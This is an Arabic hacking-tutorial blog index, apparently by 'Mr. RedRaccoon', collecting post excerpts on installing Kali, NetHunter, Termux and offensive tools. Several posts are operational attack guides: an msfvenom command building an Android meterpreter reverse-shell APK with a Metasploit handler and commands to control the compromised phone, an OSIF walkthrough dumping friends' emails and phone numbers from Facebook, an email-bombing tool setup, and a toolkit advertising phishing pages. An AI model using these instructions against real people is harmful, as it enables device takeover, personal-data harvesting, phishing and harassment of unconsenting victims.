المشاركات

عرض الرسائل ذات التصنيف برامج الاختراق

أداتي RR29-V1: أداة شاملة للأمن السيبراني

صورة
  Mr. RedRaccoon RR29-V1 هي أداة متقدمة مصممة لتسهيل مهام الاختراق الأخلاقي و اختبار الاختراق . تتميز بواجهة مستخدم بسيطة وجذابة، وتصنيف الأدوات إلى فئات متعددة تشمل: OSINT : جمع المعلومات مفتوحة المصدر. تحليل الشبكات : فحص وتحليل حركة المرور والبنية التحتية. اختراق الويب : استهداف وفحص تطبيقات الويب. التصيد عبر وسائل التواصل الاجتماعي : إنشاء واختبار صفحات تصيد مخصصة. استكشاف الإنترنت المظلم : أدوات لاستكشاف أنشطة الإنترنت المظلم. أبرز الميزات: تنزيل تلقائي للمستودعات : تسهيل عملية الحصول على الأدوات المفتوحة المصدر. الكشف عن الملفات القابلة للتنفيذ : تحديد الملفات المناسبة للنظام. التوافق متعدد الأنظمة : تعمل على أنظمة تشغيل متعددة. تصميم جمالي وعملي : يجمع بين الأداء الوظيفي والجاذبية البصرية. تم تطوير الأداة بواسطتي ، مما يجعلها أداة أساسية لمحترفي الأمن السيبراني وهواة المجال على حدٍ سواء.   تحميل :  https://github.com/xce1i/RR29-V1

أداة BadMod: أداة استغلال تلقائي للإصدارات القديمة

صورة
  Mr. RedRaccoon BadMod هي أداة استغلال تلقائي تستخدم لاكتشاف واستغلال الثغرات في مواقع الإنترنت مثل Joomla و WordPress، وهي مفيدة في اختبار أمان المواقع. تأتي النسخة 2.0 مع إصلاحات وإضافات جديدة. الميزات في النسخة 2.0: إصلاح مشكلة الألوان. إصلاح مشكلة الأذونات. إضافة خيار جديد لفحص هدف محدد. إضافة خيار جديد لفحص إضافات Joomla و WordPress . التثبيت: لتثبيت الأداة على نظام Linux ، اتبع الخطوات التالية: استنساخ الأداة: git clone https://github.com/MrSqar-Ye/BadMod.git $ تثبيت لغة PHP : sudo apt-get install php $ تثبيت مكتبة php-curl : sudo apt-get install php-curl $

أداة Cross Site Scripter (XSSer): اكتشاف واستغلال ثغرات XSS تلقائيًا

صورة
  Mr. RedRaccoon XSSer هي إطار عمل أوتوماتيكي مصمم لاكتشاف واستغلال ثغرات XSS (Cross-Site Scripting) في التطبيقات الويب، بالإضافة إلى تقديم تقارير حولها. تتيح الأداة العديد من الخيارات لتجاوز الفلاتر الأمنية باستخدام تقنيات حقن كود خاصة. الميزات: تحتوي على أكثر من 1300 نوع من متجهات الهجوم المخصصة لـ XSS. القدرة على تجاوز واستغلال الكود على عدة متصفحات وجدران حماية للتطبيقات (WAFs) مثل: PHPIDS : PHP-IDS Imperva : Imperva Incapsula WAF WebKnight : WebKnight WAF F5 : F5 Big IP WAF Barracuda : Barracuda WAF ModSec : Mod-Security QuickDF : QuickDefense Sucuri : SucuriWAF Chrome : متصفح Google Chrome IE : Internet Explorer Firefox : متصفح Firefox Netscape : Netscape مع وضعية عرض IE وGecko Opera : متصفح Opera التثبيت: لتشغيل XSSer، تحتاج إلى Python (إصدار 3.x) وبعض المكتبات المطلوبة. على أنظمة Debian مثل Ubuntu : bsudo apt-get install python3-pycurl python3-bs4 python3-geoip python3-gi python3-cairocffi python3-selenium firefoxdriver على أنظمة أخرى مثل Kali, Ubuntu, ArchLinux, ParrotSe...

أفضل المواقع لفحص الملفات والروابط للتأكد من أمانها

صورة
Mr.  RedRaccoon السلام عليكم ورحمة الله وبركاته، إليكم قائمة بأدوات ومواقع فحص الملفات والروابط لمساعدتكم في تأمين وتحليل المحتوى الرقمي: VirusTotal يقوم بفحص الروابط والملفات باستخدام حوالي 67 محرك حماية من البرمجيات الخبيثة. يقدم معلومات أساسية عن الملف أو الرابط ويربطه بملفات أخرى ويعرض آراء المستخدمين. Hybrid Analysis يقوم بفحص الملفات بإرسالها إلى VirusTotal ويدرس نشاط الملف باستخدام نظام Falcon Sandbox. Malwr يفحص الملفات من خلال إرسالها إلى VirusTotal ويدرس نشاط الملف باستخدام نظام Cuckoo Sandbox. يقدم نتائج مفصلة، ولكن الموقع تحت الصيانة حالياً. Any.Run يتيح للمستخدم رفع أي ملف واستعراضه على نظام Windows 7 وهمي بشكل مجاني، أو على أنظمة أخرى بشكل مدفوع. URLVoid يقوم بفحص الروابط من خلال البحث في تصنيفات القوائم السوداء وسمعة الروابط على الإنترنت. SiteCheck يفحص الروابط بحثاً عن برمجيات خبيثة معروفة، القائمة السوداء، أخطاء في الموقع، أو برمجيات غير محدثة. IsItHacked يتحقق من ما إذا كان الرابط محجوباً على خدمة GoogleBot، يحتوي على روابط غير مرغوب فيها، أو يقوم بعمليات إعادة تو...

دليل تثبيت Kali Linux على الأندرويد باستخدام UserLand

صورة
Mr.  RedRaccoon السلام عليكم ، في هذا الدليل سنوضح خطوات تثبيت Kali Linux على هاتفك الأندرويد باستخدام تطبيق UserLand . هذه الطريقة ليست نسخة كاملة من Kali Linux بواجهة المستخدم الأصلية، لكنها تعمل عبر Termux وتتيح لك الوصول إلى بيئة Kali Linux للعمل بشكل مشابه. تابع الخطوات التالية: الخطوة الأولى: تحميل تطبيق UserLand افتح متجر التطبيقات على هاتفك. ابحث عن تطبيق اسمه "UserLand" وقم بتنزيله وتثبيته. الخطوة الثانية: تثبيت UserLand بمجرد تحميل التطبيق، قم بتثبيته على جهازك. الخطوة الثالثة: إعداد Kali Linux بعد التثبيت، افتح تطبيق UserLand . انتظر حتى يتم تنزيل جميع الحزم المطلوبة. عند الانتهاء، اضغط على زر Kali في التطبيق. سيطلب منك إدخال اسم مستخدم وكلمة مرور. قم بتعيين أي اسم مستخدم وكلمة مرور تفضلها، ولكن تأكد من تذكرها. اضغط OK وانتظر حتى يتم التثبيت، يعتمد وقت التثبيت على سرعة الإنترنت وقد يستغرق حوالي 20 دقيقة. الخطوة الرابعة: تسجيل الدخول بعد التثبيت، سيظهر لك اسم المستخدم الذي اخترته. أدخل كلمة المرور التي قمت بتعيينها في الخطوة السابقة، وهكذا سيكون Kali Linux جاهز...

كيفية إنشاء Payload ملغم واستخدام Metasploit

صورة
Mr.  RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...

كيفية تثبيت صلاحيات الروت في Termux

صورة
Mr.  RedRaccoon تنبيه: عملية تثبيت صلاحيات الروت (root) على جهاز Android قد تتسبب في فقدان الضمان أو حدوث مشاكل في النظام. تأكد من أنك تفهم المخاطر المرتبطة وأنك تقوم بذلك على مسؤوليتك الخاصة. الخطوات: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات اللازمة: apt update $ apt upgrade $ pkg install git $ pkg install ncurses-utils $ استنساخ مستودع termux-sudo من GitHub: git clone https://github.com/st42/termux-sudo $ الانتقال إلى مجلد termux-sudo: cd termux-sudo $ نسخ ملف sudo إلى المسار الصحيح: cat sudo > /data/data/com.termux/files/usr/bin/sudo $ تغيير صلاحيات الملف ليكون قابلاً للتنفيذ: chmod 700 /data/data/com.termux/files/usr/bin/sudo $ تشغيل الأمر sudo لاختبار التثبيت: sudo $ إذا تم تنفيذ الأمر بنجاح، فهذا يعني أن sudo تم تثبيته بشكل صحيح. ملاحظات: صلاحيات الروت في Termux تعتمد على أن يكون جهازك قد حصل على صلاحيات الروت مسبقًا. إذا لم يكن جهازك مروّتًا، فإن هذه الخطوات لن تعطيك صلاحيات الروت. تأمين الجهاز : تأكد ...

طريقة تثبيت NetHunter على Termux في أندرويد بدون روت

صورة
Mr.  RedRaccoon الخطوات الأساسية: تحميل Termux: قم بتحميل Termux من الرابط التالي: تحميل Termux إعداد Termux وتثبيت NetHunter: افتح تطبيق Termux واكتب الأوامر التالية: إعداد التخزين: $ termux-setup-storage تثبيت أداة wget: $ pkg install wget تنزيل سكربت التثبيت: $ wget -O install-nethunter-termux https://offs.ec/2MceZWr منح الأذونات للسكربت: $ chmod +x install-nethunter-termux تشغيل السكربت لتثبيت NetHunter: $ ./install-nethunter-termux قد تستغرق هذه العملية بعض الوقت، لذا انتظر حتى تنتهي. لتشغيل NetHunter: $ nethunter إذا أردت إغلاق واجهة سطر الأوامر لاحقاً، اكتب الأمر exit . تشغيل الواجهة الرسومية (GUI): لتشغيل الواجهة الرسومية، اتبع الخطوات التالية: إعداد كلمة المرور لـ VNC: $ nethunter kex passwd اختر كلمة مرور ولا تنساها، لأنك ستحتاجها في الخطوة التالية. بدء خادم Kex: $ nethunter kex & احتفظ بالقيمة التي تظهر بعد هذا الأمر، حيث ستحتاجها في الخطوة التالية. إذا أردت إيقاف الواجهة الرسومية لاحقاً، اكتب الأمر nethunter kex stop . تحميل وتشغيل تطبيق NetHunter Store: قم بت...

تعريف كالي لينكس وبرمجياته

صورة
Mr.  RedRaccoon كالي لينكس (Kali Linux) هي توزيعة لينكس مبنية على ديبيان، ومخصصة بشكل رئيسي للأمن والحماية المعلوماتية واختبار الاختراق. تم الإعلان عن إصدارها الأول في 13 مارس 2013. تُعتبر كالي لينكس أداة قوية في مجال الأمن السيبراني وتستخدم على نطاق واسع من قبل المحترفين في هذا المجال. أدوات كالي لينكس: تحتوي توزيعة كالي لينكس على مجموعة واسعة من الأدوات المخصصة لاختبار الاختراق والأمن السيبراني، ومن بين هذه الأدوات: Nmap: أداة قوية للمسح الأمني للمنافذ. Wireshark: برنامج لتحليل الحزم المتبادلة على الشبكات. John the Ripper: أداة لكسر كلمات المرور. Aircrack-ng: طقم برامج لاختبار اختراق الشبكات المحلية اللاسلكية (Wireless LANs). Burp Suite: أداة لفحص سلامة تطبيقات الويب. OWASP ZAP: أداة لفحص أمان تطبيقات الويب. بالإضافة إلى العديد من الأدوات الأخرى التي تساعد في إجراء اختبارات أمنية متعددة. برمجيات كالي لينكس: برمجيات حرة ومفتوحة المصدر: كالي لينكس تضم برمجيات حرة ومفتوحة المصدر تتوافق مع مبادئ البرمجيات الحرة. التثبيت والتشغيل: يمكن للمستخدمين تشغيل كالي لينكس كقرص حي (Liv...

أساسيات تطبيق Termux وشرح الأوامر الأساسية

صورة
Mr.  RedRaccoon Termux هو تطبيق يوفر بيئة سطر الأوامر على أجهزة الأندرويد، مما يتيح لك تنفيذ أوامر لينكس والتفاعل مع نظام الملفات. فيما يلي الأساسيات والأوامر الأساسية التي تحتاج إلى معرفتها لاستخدام Termux بكفاءة: أساسيات الأوامر في Termux: تثبيت الأدوات: الطريقة الأولى: لتثبيت أي أداة، استخدم الأمر: $ pkg install اسم_الأداة الطريقة الثانية: يمكنك تثبيت الأداة من مستودع GitHub باستخدام: $ git clone رابط_الأداة حذف الأداة: لحذف أي أداة أو مجلد، استخدم الأمر: $ rm -rf اسم_الأداة نسخ الأداة أو الملف: لنسخ ملف أو أداة إلى موقع آخر، استخدم: $ cp -a "الملف" / "الوجهة" نقل الأداة أو الملف: لنقل ملف أو أداة إلى موقع آخر، استخدم: $ mv -v "اسم_الملف" / "الوجهة" فتح قائمة الأدوات أو الملفات: لعرض محتويات الدليل الحالي، استخدم: $ ls فتح مجلد أو أداة: لدخول مجلد، استخدم: $ cd اسم_المجلد الخروج من مجلد: للخروج من المجلد الحالي، استخدم: $ cd .. مسح الشاشة: لمسح النصوص السابقة من الشاشة، استخدم: $ clear الخروج من Termux: للخروج من نافذة Termux، استخد...

كيفية تثبيت OSIF على Termux

صورة
Mr.  RedRaccoon 1. التثبيت: اتبع الخطوات التالية لتثبيت أداة OSIF على Termux: تثبيت الحزم المطلوبة: $ pkg install python2-dev python2 git -y تنزيل أداة OSIF: $   git clone https://github.com/ciku370/OSIF الدخول إلى مجلد الأداة: $ cd OSIF تثبيت المتطلبات: $ pip2 install -r requirements.txt إعطاء صلاحيات التنفيذ للملف: $ chmod +x osif.py تشغيل الأداة: $ python2 osif.py 2. الاستخدام: تسجيل الدخول: بعد تشغيل الأداة، اكتب الأمر التالي لتسجيل الدخول إلى حساب فيسبوك الخاص بك: $ token ستطلب منك الأداة إدخال البريد الإلكتروني وكلمة المرور. قم بإدخالهما. جمع البيانات: بعد تسجيل الدخول، استخدم الأمر التالي لتشغيل الأداة: $ python2 osif.py لجمع البيانات، استخدم الأوامر التالية: لجمع بيانات الأصدقاء على فيسبوك: $ get_data لجمع عناوين البريد الإلكتروني لأصدقائك: $ dump_mail لجمع أرقام الهواتف لأصدقائك: $ dump_phone ملاحظات: تأكد من أنك قد قمت بتثبيت جميع الحزم اللازمة بنجاح قبل تشغيل الأداة. تأكد من احترام القوانين وحقوق الأفراد عند استخدام الأداة. إذا واجهت أي مشاكل أثناء التثبيت أو الا...

كيفية تثبيت أداة Pocsuite3

صورة
Mr.  RedRaccoon 1. التحقق من تثبيت Python: تأكد من أن Python مثبت على جهازك قبل البدء في تثبيت الأداة. 2. استخدام بيئة افتراضية (Virtualenv): يُفضل استخدام بيئة افتراضية للحفاظ على بيئة Python منفصلة وتجنب تعارضات الحزم. تثبيت Virtualenv: $ pip install virtualenv 3. إنشاء بيئة افتراضية جديدة: يمكنك إنشاء بيئة افتراضية باسم تريده: $ virtualenv pocsuite يمكنك استبدال pocsuite بأي اسم تختاره. 4. تنشيط البيئة الافتراضية: لنظام Windows: $ pocsuite\Scripts\activate لنظام Linux/Mac: $ source pocsuite/bin/activate بعد تنفيذ الأمر المناسب لنظامك، ستلاحظ أن البيئة قد تم تفعيلها بنجاح. 5. تثبيت Pocsuite3: قم بتثبيت الأداة باستخدام pip: $ pip install pocsuite3 ستقوم هذه العملية بتحميل وتثبيت Pocsuite3 وجميع المكتبات المطلوبة تلقائيًا. 6. بدء استخدام Pocsuite3: لاختبار أحد تطبيقات الويب، استخدم الأمر التالي: $ pocsuite -r [poc_file] -u [url] استبدل [poc_file] بمسار ملف الـ POC الخاص بك و [url] بعنوان الهدف الذي تريد اختباره. شرح الأداة: لمزيد من المعلومات حول استخدام الأداة، يمكنك مشاهدة ال...

Pocsuite3: اكتشاف الثغرات بأسلوب حيوي وفعّال

صورة
Mr.  RedRaccoon في عصر الابتكار التكنولوجي، يلتزم الباحثون والمحترفون في مجال أمان المعلومات بالبحث عن أدوات فعّالة تسهم في اكتشاف الثغرات وتحسين أمان النظم. إحدى هذه الأدوات الرائدة هي Pocsuite3، والتي تأتي بأسلوب حيوي لتحقيق الأمان بشكل مبتكر. Pocsuite3: أداة التصدي للثغرات بشكل متقدم Pocsuite3 هي أداة متقدمة في مجال اكتشاف الثغرات، وتبرز بفعاليتها العالية وسهولة استخدامها. تم تطويرها لتلبية احتياجات المتخصصين في أمان المعلومات الذين يسعون لتحسين أمان النظم وتقوية خطوط الدفاع السيبرانية. ميزات رائدة في مجال الأمان: اكتشاف تلقائي: Pocsuite3 تأتي مع قدرة فائقة في اكتشاف التهديدات تلقائيًا، مما يسهل على المستخدمين العثور على الثغرات دون جهد زائد. تحليل شامل: تقدم الأداة تحليلًا شاملاً للثغرات المكتشفة، مما يساعد في تحديد وفهم جميع جوانب الهجوم المحتملة. دعم للثغرات المتقدمة: تستهدف Pocsuite3 ليس فقط الثغرات الأساسية ولكن أيضًا الثغرات المتقدمة، مما يجعلها أداة قوية ومتعددة الاستخدامات. سهولة الاستخدام: بفضل واجهة المستخدم البسيطة والواضحة، يمكن للمستخدمين بسهولة الاستفادة من قوة...

تثبيت أداة إرسال رسائل مزعجة Email-Boom

صورة
Mr.  RedRaccoon مواصفات الأداة: تتيح الأداة إرسال رسائل مزعجة إلى عناوين البريد الإلكتروني. يمكن استخدامها لتوليد الرسائل المزعجة وإرسالها عبر خدمات البريد الإلكتروني مثل Gmail وYahoo وHotmail. شرح التثبيت: تحديث النظام وترقية الحزم: $ apt update && apt upgrade تثبيت Git: $ pkg install git تثبيت Python 2: $ pkg install python2 استنساخ مستودع الأداة من GitHub: $ git clone https://github.com/sumanmanna6111/Emailboom الانتقال إلى مجلد الأداة: $ cd Emailboom عرض محتويات المجلد للتأكد من وجود الملفات: $ ls منح صلاحيات التنفيذ للملف EmBomber.py : $ chmod +x EmBomber.py تشغيل الأداة: $ python2 EmBomber.py الآن، اختر نوع البريد الإلكتروني المطلوب: Gmail Yahoo Hotmail